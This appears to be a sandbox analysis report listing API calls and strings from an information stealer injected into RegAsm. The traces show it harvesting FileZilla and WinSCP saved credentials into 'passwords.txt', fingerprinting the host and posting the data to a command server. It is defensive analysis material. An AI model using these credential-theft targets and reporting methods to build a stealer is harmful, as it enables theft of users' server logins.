                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                        • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,bb7310eab4245006f125c442da2d1e50,",build_id,00437814,------), ref: 00405C67
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                                                                        • _memmove.LIBCMT ref: 00405CB4
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                                                                        • _memmove.LIBCMT ref: 00405CD6
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                                                                        • _memmove.LIBCMT ref: 00405D05
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                                                                        • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                        • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$bb7310eab4245006f125c442da2d1e50$block$build_id$file_data

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                        • strtok_s.MSVCRT ref: 0040E77E
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                                                                                        • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00406C72
                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
                                                                                                                                                        • lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040754B
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040755D
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040756A
                                                                                                                                                        • _memmove.LIBCMT ref: 00407578
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00407586
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
                                                                                                                                                        • _memmove.LIBCMT ref: 004075A1
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040762C
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00407638
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00407644
                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                        • String ID: "$"$"$"$"$------$------$------$------$------$------$bb7310eab4245006f125c442da2d1e50$build_id$mode$status$task_id

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                        • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,bb7310eab4245006f125c442da2d1e50,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                                                                        • _memmove.LIBCMT ref: 00406639
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                                                                        • _memmove.LIBCMT ref: 00406662
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                        • String ID: "$"$"$------$------$------$------$bb7310eab4245006f125c442da2d1e50$build_id$mode

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 0040E1B7
                                                                                                                                                        • _memset.LIBCMT ref: 0040E1D7
                                                                                                                                                        • _memset.LIBCMT ref: 0040E1E8
                                                                                                                                                        • _memset.LIBCMT ref: 0040E1F9
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                                                                                        • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                                                                                        • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                                                                                        • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$Value$Open$Enum
                                                                                                                                                        • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                        • API String ID: 3303087153-2798830873
                                                                                                                                                        • Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                                                        • Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
                                                                                                                                                        • Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                                                        • Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

                                                                                                                                                        Control-flow Graph

[Control-flow graph: first block 1171, 418643-418653]
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418684
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418725
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418753
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418781
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418798
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418822
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418839
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                                                                                        • GetProcAddress.KERNEL32(75B30000,004184C2), ref: 004188AA
                                                                                                                                                        • GetProcAddress.KERNEL32(751E0000,004184C2), ref: 004188C5
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                                                                                        • GetProcAddress.KERNEL32(76910000,004184C2), ref: 004188F7
                                                                                                                                                        • GetProcAddress.KERNEL32(75670000,004184C2), ref: 00418912
                                                                                                                                                        • GetProcAddress.KERNEL32(77310000,004184C2), ref: 0041892D
                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00418944
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2238633743-0
                                                                                                                                                        • Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                                                        • Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
                                                                                                                                                        • Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                                                        • Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55

                                                                                                                                                        Control-flow Graph

[Control-flow graph: first block 1189, 413b86-4145a5]
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                                                                          • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                                                                          • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                                                                          • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                                                                                          • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                                                                                          • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                                                          • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                                                          • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                                                          • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                          • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                                                          • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                                                          • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                                                          • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                                                        • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                                                                                          • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                                                          • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                                                          • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                                                          • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                                                          • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                                                          • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                                                          • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                                                          • Part of subcall function 00411807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                                                          • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                                                          • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                                                          • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                                                          • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                                                          • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                                                          • Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                                                          • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                                                          • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                                                          • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                                                          • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                          • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                          • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                          • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                          • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                          • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                          • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
